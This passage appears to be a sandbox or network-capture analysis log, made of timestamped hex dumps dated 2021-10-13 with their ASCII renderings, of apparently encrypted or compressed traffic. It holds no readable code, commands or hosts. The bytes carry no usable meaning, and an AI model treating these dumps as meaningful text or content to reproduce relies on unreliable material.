                                                Data Ascii: 5`{^TTE$jE"w2_RBCB;=;_:*G9G=+7TmxZYFLi!DuVpr[S2cQ1|&THv#]?0E!R3!VFbi@S]m9WU\r6F<vsx/B@tNc'A{m>7e;zt
                                                2021-10-13 18:35:47 UTC162INData Raw: f8 91 fa 79 ac 17 68 15 8c 61 92 f1 d1 a0 94 ed 4e f7 90 ed 51 16 15 06 1d fd fd 2d 10 90 d7 85 0d a5 aa 7f 16 02 2e 6c 3e 94 fc f0 24 6e 00 bf c5 ba a0 51 db bf 4e 73 83 54 44 45 5a 56 7a 88 ad 39 19 42 11 6b 96 e3 7f 90 06 13 95 47 10 c0 ff 50 8a 6c 90 d5 40 b2 54 ea 84 b7 3f f8 44 a6 29 b0 e6 36 3a 71 a9 db d7 86 db 8a c7 d3 60 1b e6 01 1f 29 6b 8a dc a5 74 18 8d 83 5d 5c a0 ca 1e 9e 86 d8 0f b1 08 ac 4d a5 23 c4 5c 7f ad 3d f7 e1 a1 e1 88 56 67 49 51 62 55 9e 80 17 22 82 a5 1f 46 da d1 4e 9b 57 6e cd e5 22 0c c1 19 a9 be 74 c4 e6 48 a4 d3 99 96 d1 6e 28 ad 2c c4 c5 ef db 82 26 8c 0a ae 65 e8 d0 a4 83 bb 1e 73 41 ce d9 b4 7a a8 38 5a 60 8f fe 00 61 f3 a7 8b 5f dc f3 1c d4 3f 29 81 05 38 a6 0d 50 46 b7 26 06 35 1c e1 8e 61 8d f0 e5 01 75 95 6d 9a 15 c5
                                                Data Ascii: yhaNQ-.l>$nQNsTDEZVz9BkGPl@T?D)6:q`)kt]\M#\=VgIQbU"FNWn"tHn(,&esAz8Z`a_?)8PF&5aum
                                                2021-10-13 18:35:47 UTC163INData Raw: d2 3b 12 75 93 82 dc a0 83 41 21 62 51 64 da 8d 47 37 3b 3b a6 22 27 69 89 4a 98 c7 41 86 d4 01 82 ce cc 9d 65 e7 b2 1d 91 15 51 06 49 2c 9b 1b 0a 13 02 b0 c1 3c 8c df 8a b3 dc c8 2b fa 3c 6c 7e dc 1b 4d 3a b9 61 3c 8f 4a b4 03 49 38 a3 b7 8a 36 8e cc 6b ba 66 d6 df 90 ec 3a 29 81 c7 01 8e c2 51 21 80 2e c4 c0 95 6f 85 5e 8e 35 ea 38 8c cb de b6 48 bf d5 8f be 64 d9 35 a4 b0 b6 5b 4b 6c e9 be 4e 6b 62 93 c8 64 77 a7 20 3e 78 96 db 32 11 3e 9a ec 8a f0 20 f5 c8 56 c0 4c ab 9b 05 75 b9 21 b1 94 f3 4d 33 3f 29 c3 85 d8 05 91 85 70 19 ab ea 59 b7 27 d1 63 a1 27 da 68 0c c1 29 d6 07 99 7e d6 d3 fb b1 9f 60 7f 58 51 d8 87 58 68 99 02 15 ad 32 4c 66 7e 8d 9a b5 39 b8 53 bb fc f3 54 4b cb ef 76 bc 32 f6 cf ec 88 0f af 94 28 b1 b8 6f 2c e6 c0 ef 55 eb 05 83 22 a0
                                                Data Ascii: ;uA!bQdG7;;"'iJAeQI,<+<l~M:a<JI86kf:)Q!.o^58Hd5[KlNkbdw >x2> VLu!M3?)pY'c'h)~`XQXh2Lf~9STKv2(o,U"
                                                2021-10-13 18:35:47 UTC164INData Raw: 6f 28 5e 81 ac b8 55 47 c2 b6 ba 46 17 6b 9b c1 16 29 8d 5d fe f1 52 f2 70 d3 84 d7 91 8d b7 cd f1 49 28 d7 b3 ab 54 ea 31 7a 97 a5 04 b7 f3 49 d2 d2 7e 22 de f8 33 76 38 99 73 b7 dc f3 af 39 16 20 e2 c3 60 52 5d ff 61 cf d4 98 18 fd 79 bf 37 c5 c4 b2 0b 97 6a 1b 45 50 9d 74 f5 9b 63 fa de 37 94 90 7b aa 9e 69 30 c6 74 04 15 01 6e 29 68 14 2f 51 e9 91 86 b5 d4 b9 2c dc 17 b7 36 a9 32 cf 52 5b 7c 26 fb 59 35 39 a2 a7 f0 da aa 6e d1 f8 d9 96 c9 5c 8d c3 eb 90 d1 1b 61 71 78 1a 6d 17 fc 9f 1a d2 99 ba 23 e8 f5 19 43 9c 45 11 bb dc 02 2b 52 db 80 3d 1f 4a 5d 2e fc d7 a7 f9 f1 62 a7 ae 14 12 31 6f 8a 9f 7b 8b 15 b6 05 2d bc 56 56 5e 40 7a 98 64 44 87 6b 33 b0 5c 6b 90 e8 18 13 9a cb 45 e9 23 5b f8 34 3f 33 18 21 52 ad eb cb 0f 62 29 72 31 53 6e d9 12 29 6b 32
                                                Data Ascii: o(^UGFk)]RpI(T1zI~"3v8s9 `R]ay7jEPtc7{i0tn)h/Q,62R[|&Y59n\aqxm#CE+R=J].b1o{-VV^@zdDk3\kE#[4?3!Rb)r1Sn)k2
                                                2021-10-13 18:35:47 UTC166INData Raw: 5a 4f cf fc 57 1a d0 9c b1 09 99 29 60 3f a0 81 be 4c 96 70 42 ea 3f 1d f5 87 4a e5 7d a7 08 1f ea db 49 2a e0 2f 50 6c 91 ce e4 3c 8e 3c 84 28 9b ed 77 18 8a 0c 1a 78 18 aa cf 97 7c 33 07 2e ca 64 5b cb 50 7c a0 56 b5 ea 3a 88 cd ef 5f ee cc b3 4c 6d 88 d3 97 69 67 c4 88 2a d8 a6 2d 42 71 25 76 82 d4 27 f7 c0 c1 0f b3 20 6b 4b 18 db 5c 67 1f 4b 2b 6b 9f e3 80 ab 42 9b 54 5a e2 f8 c4 4b 22 30 47 31 56 11 ba f9 22 73 a3 52 79 88 f2 5c 9f db 93 7d 58 92 fd 0c 08 86 cc 93 eb a4 96 f6 30 be 4d 5c 5d ff 7e 88 06 05 87 52 f6 8c fb 05 80 df 41 2f 7b bb b5 be 9c e2 2c ee 8a a5 ac 42 ab 64 78 12 7c 2a 53 fc 7a 00 b9 2e 54 5d ee cc 56 7c 1d f5 31 e2 12 1c ef 64 91 50 d5 51 b6 17 ab ca eb ba e8 03 56 57 d0 92 3d 7a 91 a0 c9 f5 fc 87 75 f6 1e 9e 8b fb 91 c4 b7 3c 74
                                                Data Ascii: ZOW)`?LpB?J}I*/Pl<<(wx|3.d[P|V:_Lmig*-Bq%v' kK\gK+kBTZK"0G1V"sRy\}X0M\]~RA/{,Bdx|*Sz.T]V|1dPQVW=zu<t
                                                2021-10-13 18:35:47 UTC167INData Raw: 30 f6 3f ed dc 0f b6 ac 96 74 0c 84 c2 58 86 e5 ae a5 04 50 67 b6 dd a9 fb 89 34 27 73 9c fc 7d 1a 53 d9 97 c6 d1 65 e4 2a fe 0f 6e 71 b2 a7 9b e9 13 27 f5 50 4d 73 93 22 c2 7f 51 01 e2 80 29 67 ea a8 5f 78 20 c9 ec b3 f4 6e da 0e 1d f2 7b 0f ab 38 8c ed e2 f9 fc ee c6 81 13 d1 55 ce 77 ae 1b 8b 58 6c ac f7 57 c1 cc c6 d6 99 7e 34 80 11 0f 51 6f 90 e2 c3 1e cc c9 06 0b a8 ac 40 22 49 3c 99 7e 1d a8 72 b9 d0 63 f1 6d 1c 39 a0 9e 9f e6 c5 b5 9c ed 4f d4 b0 60 63 da b3 8d fd 66 79 f5 54 1f 41 95 df 07 76 21 41 14 17 28 9c 62 71 88 77 e0 2c c4 cf b9 6f 90 f8 3e 54 62 6a de 20 3c 78 b2 1a c6 64 44 92 7b 87 e6 37 02 bf 6d eb 19 ec 24 dc fe 3f 1a e4 bb e9 14 29 76 95 5e cd d5 16 4e ef 5c 7d 0c e3 a1 1e 19 60 d8 78 8e f7 bd 74 bb 69 83 43 10 cc 3e 0f b2 ad c0 e0
                                                Data Ascii: 0?tXPg4's}Se*nq'PMs"Q)g_x n{8UwXlW~4Qo@"I<~rcm9O`cfyTAv!A(bqw,o>Tbj <xdD{7m$?)v^N\}`xtiC>
                                                2021-10-13 18:35:47 UTC168INData Raw: 28 df 2a e7 29 f1 ea 33 0e 91 aa 93 54 ab fd 5a 74 8e af 9d 7f af ce bb d6 e6 f5 0c 3b a1 19 a2 3d b6 8f 64 70 c3 e8 1d ca 71 8c cd ec 0f 15 21 72 ce 01 92 cb f5 1f b3 ac 8b 66 9c 53 78 82 0d b3 2a e8 10 7f dc a1 7b 5a 12 30 d5 18 32 6f 97 71 f9 93 28 f9 4b 21 4a df 46 81 09 34 70 1e c6 67 d1 29 0a 88 d5 85 4e 48 54 33 93 df e0 84 73 fc f4 17 d7 05 ed 43 21 4f ee 23 bd 33 1b 4f d7 2b ad b1 29 70 f6 8a c2 16 34 cd af c9 01 0b b5 20 d0 5e 47 a8 04 33 1e cf 1e a7 19 10 22 63 4f 63 de fe d8 fc ce 30 fb 3c 9e d3 98 e8 2b 63 ae a6 c5 c4 13 bd e9 5e 84 42 b9 d5 9f 29 26 e8 1c 5e e3 66 79 a5 fe 3e bd 78 f0 84 c9 db 77 04 29 a2 6d a4 07 db 81 e0 3b 21 7a b4 00 c3 c1 dd 2b ab 35 8f 4e 5f fc fc d6 e7 20 e1 6e 8d 83 ea 4a 84 f3 be 92 ee 11 a6 de c9 45 15 5b 43 9a 63
                                                Data Ascii: (*)3TZt;=dpq!rfSx*{Z02oq(K!JF4pg)NHT3sC!O#3O+)p4 ^G3"cOc0<+c^B)&^fy>xw)m;!z+5N_ nJE[Cc
                                                2021-10-13 18:35:47 UTC170INData Raw: 86 c8 65 1e 09 82 87 fc 87 4c a0 86 dc 21 77 31 15 21 55 cf ae 9f 12 3c 9d 94 50 46 b2 ad 25 7c 84 2c f3 6e 31 eb 0c 8b 52 50 f6 f8 d2 50 77 44 1c 06 0f b6 01 5c 3b 43 32 17 09 91 62 71 88 96 ee f5 c9 85 a5 13 b3 d2 ad 28 09 2a 8c c2 52 5c 6b a8 b0 33 9c 57 d1 fd 23 60 6a 1f 49 82 8d 5f f6 d5 92 d3 68 72 1a ef 6c aa fe 76 38 8e 6e cb cf b2 aa 22 35 08 0b bb d2 5f 5e 44 a0 a8 b4 17 35 ab 20 d1 1a 00 00 e6 f4 84 a4 2a 53 d8 12 3b 1c ec a6 03 29 76 37 b6 51 f4 cc 71 95 79 76 0c cd 47 2a fa d0 6d ab 0d 3f c6 c4 49 32 42 6a 0c 1a 3a 87 51 d7 8d 70 f6 78 0f 6f 7e 9b 1b 51 d4 1d 72 29 f2 57 d8 0d a4 76 f3 44 94 16 2f 62 7f a1 31 9e 16 0f 7e d7 94 9e 16 85 ad 8e 7b 69 da 36 b5 dc 87 78 c9 ad 24 64 b5 96 e5 ba 5d e6 6f a3 b6 79 07 9d 7d bf c7 b5 1e eb 84 53 0c 3f
                                                Data Ascii: eL!w1!U<PF%|,n1RPPwD\;C2bq(*R\k3W#`jI_hrlv8n"5_^D5 *S;)v7QqyvG*m?I2Bj:Qpxo~Qr)WvD/b1~{i6x$d]oy}S?
                                                2021-10-13 18:35:47 UTC171INData Raw: 3f 8b 55 d1 1f c1 3c 5d e9 0a 04 07 8f 44 b2 bc f4 12 30 ec 26 54 40 9a b5 2f 94 77 bc f0 b9 9d 78 85 48 0f cb 47 d9 6c 07 7c 39 16 79 91 85 42 c8 88 12 42 a6 8d 1b 25 e5 14 cd 86 d0 7b b5 f5 76 cf 16 a9 6f 8c c8 5c d9 f1 16 3d 36 10 ee 69 80 34 30 4e bc 37 1c c0 e8 fb 72 0f 6c 60 b2 89 f1 6a e0 37 21 8c df 86 c9 fc ce 47 da 05 a1 ec 9b 56 8f ac af 21 5c 62 34 96 d9 b4 5d fe 49 4d 30 ee ca d0 b5 36 ad f4 d8 0d a7 0f 90 cc cd f5 78 c2 fa ec e5 4b 36 85 05 bb 22 30 50 23 41 21 bc 57 bf 35 01 96 c1 39 e3 82 53 c3 cc 9f b0 a6 bd 74 fe bb c9 c5 40 d5 20 cb f5 ea d5 77 d6 1d 50 a9 a5 10 25 81 8d e5 41 85 34 89 46 80 dd aa 77 a8 ba e8 01 2d 7c 26 0c 98 7f c3 c0 47 3a ed 4a 51 0c 2f 01 44 8f bf 3f 62 6a 2f bb c6 68 04 0e 0a 3a 21 50 71 7a ba 76 ec ba aa 73 71 26
                                                Data Ascii: ?U<]D0&T@/wxHGl|9yBB%{vo\=6i40N7rl`j7!GV!\b4]IM06xK6"0P#A!W59St@ wP%A4Fw-|&G:JQ/D?bj/h:!Pqzvsq&
                                                2021-10-13 18:35:47 UTC173INData Raw: c3 f4 f2 13 d5 11 b3 22 c8 66 b1 54 de 1c ce 63 f1 68 f0 25 43 84 36 17 a5 13 e3 b4 5f ce d0 53 2e 13 92 8a c9 ea 1c 59 26 77 bc 54 08 18 8b bb 50 66 cf 11 fe ac dd 83 54 65 6f 73 34 8a c4 01 9f e7 7e 26 c9 58 80 a7 6a 0e 23 c1 db 8c c1 cf 4a 70 7f 86 f9 70 a9 84 fc 3f 42 be 69 2f 7c 36 85 43 ce ad 29 58 6a 28 08 b4 9d a9 a2 6b da 39 a1 97 53 21 15 a8 21 8b af 28 fe eb bb 84 d2 99 11 a0 ab 05 3c 09 26 ee d5 35 c8 6c 3f 35 dc f4 fa cd 4f b4 af 91 92 f2 be 5a 50 53 d6 48 b4 c8 63 fd 7a 35 59 d9 38 50 04 10 ca 0f ab 0c 02 35 31 d0 0c 36 8f 5d 58 92 ef 61 da df e8 23 5f ff 72 48 a5 60 78 29 7d a9 5d f6 65 2b 27 6e b4 dc 13 9f 22 f7 77 33 92 34 81 b0 41 f4 d4 3c b2 76 67 12 28 82 89 68 4c c4 6f 5b 81 d9 6c ab fa ed a5 82 83 37 0c 96 bd d5 9a e9 a0 9e c8 41 cf
                                                Data Ascii: "fTch%C6_S.Y&wTPfTeos4~&Xj#Jpp?Bi/|6C)Xj(k9S!!(<&5l?5OZPSHcz5Y8P516]Xa#_rH`x)}]e+'n"w34A<vg(hLo[l7A
                                                2021-10-13 18:35:47 UTC174INData Raw: 9f 2e 76 9a d3 92 d7 31 de 3e 28 ae b4 5a ae 79 a0 85 42 4c 41 4c 9c ff 73 92 bb ac 91 3a dc 43 27 76 12 f3 f3 2d 56 55 ce 6b 91 7a 28 74 b8 9a f8 c2 e2 84 6c d3 93 97 d2 22 ff 2f 6f be 7c 9b 22 a1 0b b8 0f e1 aa 85 5a 71 a5 8a de 76 2a e4 09 b7 a6 88 0e 31 63 4e 86 e1 93 57 fd b5 a2 a2 fe 4e 1c ed e3 a3 26 06 b6 88 7d ff 63 d8 dc a6 50 56 4f dc 1e d5 87 5f 48 28 4b 31 7e 8f 8d 4b 8a 32 21 57 de 1a 7e ec 68 13 97 dc f6 8e d4 14 15 20 a0 79 b2 a6 2c 23 53 92 ed 24 c5 c4 6b 1a 23 83 55 c9 5c a1 0b 44 13 a3 05 87 52 79 91 a6 5c 86 5a 96 0f c1 ea 86 28 c4 ef 7f be a9 a5 d0 67 fa df b5 2a e2 10 35 1e fa b7 f1 ae c1 c5 ba e6 c5 52 01 7c 1e db 08 0b 0d b9 21 a8 df 80 3b 1e db 2c c0 00 13 d4 d5 67 47 20 85 89 7f b5 66 73 1c d0 61 df 7c db 91 d3 6b 25 b4 d6 93 99
                                                Data Ascii: .v1>(ZyBLALs:C'v-VUkz(tl"/o|"Zqv*1cNWN&}cPVO_H(K1~K2!W~h y,#S$k#U\DRy\Z(g*5R|!;,gG fsa|k%
                                                2021-10-13 18:35:47 UTC175INData Raw: 47 95 6b 87 57 e7 8e 44 65 f1 41 22 6b 53 8e 63 3e 28 80 29 2d 7c 81 7d fa ce 40 a2 15 cd 79 b0 a5 fb b4 a5 ea 31 63 f2 d9 a5 fd f2 f4 19 f8 06 41 24 3a c0 4c b5 72 0e 10 1b df b1 d1 e6 3b a1 d3 80 56 97 47 8e 75 aa 53 d7 7b 57 ed 73 27 f9 e6 b4 bf 7e 53 e2 07 b5 15 70 73 80 2f 6e 0d ae 63 83 40 87 54 f1 ed 58 08 19 f3 d3 82 74 16 d9 60 64 95 73 3c 9b 94 0b a5 af 2a 52 9d 7e 21 46 a5 f8 fa 74 a7 84 d1 a0 90 07 3c 7b fe f8 66 57 dd d1 ea 65 ec 33 16 3b 3b f2 b7 af 11 ec 3d 5d dc 1f 54 56 67 ce e8 91 e3 b2 a9 a9 de 31 c5 1e 87 43 00 2c 82 f5 6e eb 21 7f 64 9e a6 9b c4 35 1f 6f dc 16 7c 38 34 63 5d cb 06 1d 06 01 d4 18 65 fe dd b7 05 a6 07 96 65 fc e5 4e 93 14 43 fb ce bc 5a a6 43 08 2a d3 33 d4 b3 a0 a2 4f 57 63 f2 93 5c c2 64 9b e2 3f 78 06 4f 69 dc 25 bb
                                                Data Ascii: GkWDeA"kSc>()-|}@y1cA$:Lr;VGuS{Ws'~Sps/nc@TXt`ds<*R~!Ft<{fWe3;;=]TVg1C,n!d5o|84c]eeNCZC*3OWc\d?xOi%
                                                2021-10-13 18:35:47 UTC179INData Raw: b9 08 0e 3c 7c f2 a7 fc 55 c5 3e 8f ad e1 e9 d9 33 c9 24 cc 6b 98 4f da 58 1c 2e 8c b7 7e 14 fd 80 5a 68 18 3c 92 ec 3c 96 52 1c c7 51 53 9d 60 a0 e5 a5 13 b0 4c 48 de 3c 96 ec 15 81 c7 3d 37 b3 a8 b0 61 40 8e ff 4b 18 a4 68 e6 31 6d 6a cb f1 fa 8f 4d 27 36 1a 6b c0 55 c6 27 c0 e0 70 08 1e 9c 31 c2 09 bd d4 40 54 aa d4 3c 90 b3 e1 4a fd 30 f7 19 8f e6 62 36 91 31 b8 f5 0b c4 5d b6 63 4d 63 84 d9 d0 f9 b0 f5 3f 1e 81 45 7a 5e 83 f5 84 8e ce 42 75 fc 22 cf 6f d0 a3 06 1a 2e da d3 d8 19 7a b4 06 c9 e0 21 b1 4b e4 07 b7 93 57 2a e5 bb 74 d1 db 75 f9 5c d8 cd e0 c5 82 2a f2 d6 52 ff 5b 78 95 42 af 24 2c 40 8a e2 7e 22 8a d2 5a 7b 35 74 30 e7 b3 9b a0 b8 3a 41 cc b9 d2 96 27 49 87 36 fa ec 11 40 44 12 ae 85 8e 2f 8c ec e7 82 3c c3 06 99 fc d0 c8 fc 59 75 e3 8a
                                                Data Ascii: <|U>3$kOX.~Zh<<RQS`LH<=7a@Kh1mjM'6kU'p1@T<J0b61]cMc?Ez^Bu"o.z!KW*tu\*R[xB$,@~"Z{5t0:A'I6@D/<Yu
                                                2021-10-13 18:35:47 UTC183INData Raw: 2b 3f 1d fa ba d9 38 f6 4c 5b 89 db 79 da 8d bd b1 35 22 67 99 74 f3 fc 3d 11 b6 a5 7e ee fc 37 62 ec 38 85 52 48 7d d4 a4 84 c3 ce 6d bd 7d 5c c1 6f 77 37 d4 26 fa 36 4d 3b 54 d6 24 c2 ea 5c 7c 14 10 04 98 3d 02 09 97 c3 35 05 7d 09 9e 96 ed 47 04 36 19 c6 ed 58 51 67 19 56 5d e3 bf 6a dd 9e a6 b4 27 90 62 6d 92 57 6e 01 95 65 f9 b8 44 c7 5a 9f 1e fa 74 a9 e7 b8 41 c5 39 18 3d 1f 50 01 90 0c 4b 92 d1 cd 6e af a5 07 8d b6 5e 61 fd 67 e1 90 4d 62 f5 58 50 4a 77 1a 21 5f f1 5f f0 77 17 a7 08 18 3c be ef 79 20 d2 7d 0e cc 69 8d 42 bb ee f4 f9 f0 85 c4 53 c7 5c ae ed a6 43 74 0a 53 cc 58 ce cb 49 36 8b b8 96 f2 f2 eb 86 2d e5 99 a2 62 fd a4 52 f3 59 88 3c 8b 53 0e eb 2d 51 7e 15 54 e2 9f a0 29 78 30 e1 8c f4 f1 0f a4 87 54 4d d0 94 b1 38 83 57 9b 7b 81 72 7e
                                                Data Ascii: +?8L[y5"gt=~7b8RH}m}\ow7&6M;T$\|=5}G6XQgV]j'bmWneDZtA9=PKn^agMbXPJw!__w<y }iBS\CtSXI6-bRY<S-Q~T)x0TM8W{r~
                                                2021-10-13 18:35:47 UTC184INData Raw: d5 97 74 05 91 19 8d 7d 85 ab 8e 4b 1f e8 88 d5 86 c2 50 de 5a a1 17 bf b2 73 c7 f2 c2 4e 48 9c 1c 24 c8 77 a2 8a fe c9 19 f4 c9 f6 cb e9 29 45 df 85 4e 21 9f 47 33 13 ad 30 ce 94 00 b3 36 86 d1 cc 4b d1 12 da 05 9e 96 7e 5c e5 ab 3b a3 40 97 36 94 a4 a1 b0 9c 22 fc d5 1e e0 a3 07 99 3a 9e c5 e1 1f 3a 36 ab 03 1c fe 12 28 f9 e2 e4 41 7d ad 6d bb 2c 0c 21 51 d3 94 c0 7a b2 d6 fa cb f6 8b 40 dc 2f 95 d1 e7 be 41 29 41 0a be 3d a7 0e 25 b7 8f ed 43 3f 02 27 f7 79 57 c3 d4 18 f6 fb 80 dc fc f3 48 b2 9e 1e 3d eb a2 90 59 8f 51 8c c3 e9 5f 0c 9b 7d b2 af 19 ec bf 50 4d 36 64 cc 99 68 03 80 00 a4 e2 ae be 47 f4 e0 27 79 bc f3 82 49 14 55 50 23 13 af 2d 6b cd b9 e0 43 d8 07 96 ee df cb df 24 3d a2 81 bc 4b 0c 87 44 23 4f d9 3f ce 99 b0 a0 bc ab 94 81 0a 1e ce 6c
                                                Data Ascii: t}KPZsNH$w)EN!G306K~\;@6"::6(A}m,!Qz@/A)A=%C?'yWH=YQ_}PM6dhG'yIUP#-kC$=KD#O?l
                                                2021-10-13 18:35:47 UTC189INData Raw: e7 44 a2 82 db be 4e 1a c6 42 9b db ce 8b 42 ad 62 72 37 39 a5 52 bf d3 99 9b 13 a2 bc 10 2a b7 3f 21 61 7d e4 24 d9 8f bf 06 3d 28 7c 1b b8 41 22 be 7f 9d 5b 4d 5f 6e 00 13 5e 34 89 f6 03 e1 88 88 cf aa 96 d2 4e e3 b3 36 9e 81 13 43 0d 49 15 98 16 5a 1d 71 a3 23 7d 92 cc e7 f9 40 9c f1 a5 c4 2c d1 db a9 2f b8 c9 2b 81 91 f7 5c 89 0d fb 52 f6 4f 7b 36 86 ca 70 18 18 1d 21 94 b2 ae b3 2c ec 19 aa 7d a4 8f 42 a7 34 ad 9a 08 1f 41 2a ea a2 c9 67 e9 b1 c9 97 79 46 f1 44 14 78 28 00 c8 66 9c 5f fe f3 f0 2f 6a 1a d2 22 d4 4d 39 ed ac b3 2d 71 99 4e 73 31 ca d0 72 18 82 f5 59 f6 6c ca 61 f0 ce 61 f6 84 c0 10 34 c6 7a 9c 52 4d 32 fb 61 dc 21 f8 fb 8b 5e 6f 2b a1 01 d3 8c 39 ba 57 c4 52 5c 2f 29 45 b5 d1 7e 33 00 bb 13 b7 8b e0 47 27 62 68 00 3d 2b ff 1a 25 5b e0
                                                Data Ascii: DNBBbr79R*?!a}$=(|A"[M_n^4N6CIZq#}@,/+\RO{6p!,}B4A*gyFDx(f_/j"M9-qNs1rYlaa4zRM2a!^o+9WR\/)E~3G'bh=+%[
                                                2021-10-13 18:35:47 UTC193INData Raw: 49 19 6d 6f fa ef 42 74 a4 48 ec 67 46 c9 7f 53 dd 7a 14 a3 2b 83 60 ed 6c 50 57 ee 7e 47 2f 7e e5 16 e2 71 ef ad 4c 47 52 88 90 9e c5 ae 80 98 0e c2 58 5b 06 d0 67 92 33 54 42 d2 a9 30 42 a7 fb 41 a7 3b b0 29 da 0a 1e 22 6b 05 77 96 e4 c2 f4 64 60 13 92 dd 72 15 ee ea 99 fd d8 0d a7 f1 8d 5c da 5a 2b 64 9e 81 a9 90 fa d1 bb 30 1c a9 89 fd 76 c6 47 31 55 d3 47 8a 99 68 b2 d4 13 5f f4 3d 37 01 a0 9d b5 da 69 a0 9f dc 32 d6 fc f4 d6 10 2d 53 70 f3 72 df 75 75 8b da 2e 48 15 0b 0c e3 a7 0f b7 10 08 4a df 28 94 03 c0 52 67 30 9f e1 a4 07 58 b8 48 a6 2c 1f a0 c5 d0 55 7e b9 2a e4 20 30 b2 a6 29 54 a6 bb 72 db b1 06 8b de a0 8a c6 dc db 26 3b 3e 23 cc 3d 08 3c a5 f4 48 99 b0 90 be 18 d5 a3 57 93 72 46 a5 30 da 89 a8 da 0c 34 3e cb f1 07 93 3f 06 1e 8a dc 44 b3
                                                Data Ascii: ImoBtHgFSz+`lPW~G/~qLGRX[g3TB0BA;)"kwd`r\Z+d0vG1UGh_=7i2-Spruu.HJ(Rg0XH,U~* 0)Tr&;>#=<HWrF04>?D
                                                2021-10-13 18:35:47 UTC197INData Raw: 6d 13 fc a6 8e d0 94 5b 43 2f 6a 1a fd b7 87 49 2a eb bb 86 d6 0a 10 81 51 88 c3 cc 9d a6 74 65 69 68 cb fe 9e ce 72 0d bc 19 73 7e 06 01 3d 17 93 47 da ae 08 0d bb d1 cb c0 c1 b6 ed 40 87 f0 72 01 db 9c 4b 48 34 a4 73 b2 83 d1 c5 41 7e 61 f7 50 e9 d3 8e 81 ba 18 25 64 45 b9 2a ff 6f 91 80 eb f4 34 41 63 e0 08 31 e4 4c 46 a2 9c 15 60 6a 22 ef ce 79 af 30 ed 73 7c a8 b0 68 25 76 54 90 d2 c3 43 01 5e b8 64 86 57 6c 9e c8 1f 88 e2 ca 50 4f ea 84 97 67 14 0a 13 c9 30 c7 09 cb fd 87 2c 5d 04 73 78 98 87 f3 f3 29 db 76 45 dc a6 f2 35 ef 32 02 32 44 cb 60 8d 26 12 de 66 af 94 8b 86 23 33 c6 d0 08 d7 64 0b 36 66 1d e6 ce 09 38 32 8a 47 8d 3e 0a 22 69 ff f5 e8 43 ee 2c 97 b2 08 7b 75 be ab 56 97 94 92 f5 74 fa 67 54 6c bb 7e cb 05 20 cd f9 8c ea 11 46 1b a6 7b 02
                                                Data Ascii: m[C/jI*Qteihrs~=G@rKH4sA~aP%dE*o4Ac1LF`j"y0s|h%vTC^dWlPOg0,]sx)vE522D`&f#3d6f82G>"iC,{uVtgTl~ F{
                                                2021-10-13 18:35:47 UTC201INData Raw: a6 f8 6b 87 52 af e4 46 88 e6 d2 7e 22 de 1a f3 ad 86 ee 08 a5 17 b9 80 5e dc af 3d 08 01 89 fe 8f ff 85 33 ab 0d 96 54 a2 9f 11 a5 1b 69 ad 9a f7 76 01 b3 03 b6 9c 50 14 81 bf d6 b6 b6 91 4b d2 bf 31 9b 94 f2 d3 3b c7 84 e6 5a 95 d8 93 52 5b 6c d7 a9 a0 11 97 b5 82 39 08 4d 66 92 56 96 f3 40 89 30 2e e6 95 e1 b5 3f 1c 2f 12 ae 90 59 bc dc 3e 26 5c df a5 19 4f e6 95 a2 06 2a fc fc c9 44 27 d8 0a 20 86 d0 93 d4 78 27 6d 9a 13 ce df b4 83 f0 7b c8 70 0b a8 2b 5e f5 ca 83 a6 93 56 05 bd 20 3b 7e 20 ce 6b 33 64 dc 31 5d 00 bc 3f 16 38 81 0c 12 aa 36 df 96 ee c0 ea 25 6c 44 8e 33 b9 f1 49 2c f4 6b fd 86 e4 10 91 d2 4e 5e 63 f2 76 15 25 c0 7c 3a 99 75 23 46 90 f3 fb 28 fe fd 69 30 15 52 5d e2 3f ab 5a f9 73 ad c8 97 c5 d1 e3 a1 b7 15 24 47 5b ef 4f c6 85 73 0f
                                                Data Ascii: kRF~"^=3TivPK1;ZR[l9MfV@0.?/Y>&\O*D' x'm{p+^V ;~ k3d1]?86%lD3I,kN^cv%|:u#F(i0R]?Zs$G[Os
                                                2021-10-13 18:35:47 UTC205INData Raw: 47 94 fc f0 c0 26 02 03 3f cd e5 b7 21 b3 03 b2 54 52 4d 79 83 a2 f6 d1 46 4d 3b f4 f1 50 68 e6 4b 30 d5 a6 ac 02 d3 89 58 51 73 55 c5 f1 6d ba a3 95 46 6b 32 9e a9 ec 3c 83 09 af 97 50 50 b6 c3 c7 5c 88 cb db 73 bb da 3c b8 75 3a 97 7a 3c 8d b3 f6 d3 bc 7b 9f e7 11 88 07 e3 5c 31 16 95 3f 1e 74 10 90 54 4a 0a 44 bb 2d 5d ec 2e 4e 5e 72 67 e2 69 8c fb 56 f1 e5 88 db 8e ce 72 f4 15 ad 9b 77 b0 8d 6e 3f f5 f1 73 42 c8 9a ad 44 15 f3 43 9b 63 1f 70 07 73 d4 01 3c f3 52 4f 2e e4 27 8e d1 bb c6 5b d4 a8 5b df 97 70 ae a6 83 aa 55 c6 dc 05 92 c4 74 36 3e 06 3e 56 e1 97 53 70 1f 5f a3 30 43 4c bc ad 98 e6 ca 41 2a db 7c 41 20 e6 16 1b eb f9 5b e2 23 b1 f7 4f f7 6a 2d 9c 50 6d 5a e5 d3 b6 0b b2 a0 c5 f0 37 24 c5 67 9f 0e 9b cc 6b a3 e8 1e c1 e7 9d 5f 47 09 89 40
                                                Data Ascii: G&?!TRMyFM;PhK0XQsUmFk2<PP\s<u:z<{\1?tTJD-].N^rgiVrwn?sBDCcps<RO.'[[pUt6>>VSp_0CLA*|A [#Oj-PmZ7$gk_G@
                                                2021-10-13 18:35:47 UTC209INData Raw: ed 51 d2 75 be df 19 38 90 fe d1 46 4f 65 f5 53 cc 46 12 d8 cc 79 b2 a6 b6 16 e5 d6 0b a7 ff b3 23 fd 3e c7 e3 f7 b5 8e 3e 37 11 ae bc 7e 16 af 6b fe e8 29 d4 b7 de 1b 4c b4 99 91 d3 53 d0 77 b2 85 ee bc a9 15 b9 7f 7c 32 af 22 92 50 fc 56 c8 7d a8 84 ea 09 03 6e 68 0a 12 db 7c 98 ec 22 c0 65 19 88 08 05 91 7a 1d d2 54 ac b9 d6 43 3f 51 79 49 d8 9c ea 3e 9b 55 e3 47 7d d6 12 2f cc a4 c8 d2 9e 23 54 44 ac 8d 6d 29 26 81 bf da f9 ba 24 08 1a c6 6f 7c e6 37 2a 47 9d cc 73 9d 20 c9 ab 0e c5 6d 13 a5 0a 07 a4 bf 4e e9 dd 83 4a 59 6b 2c ed 5d fa e6 95 ad 70 06 15 b8 70 b6 72 af 3c 8c 87 4b 69 a5 f1 a8 34 9b 6f 96 c0 78 b9 16 51 d0 60 8f 97 08 fa 62 e3 af 25 55 fb 48 10 ee ad 3e 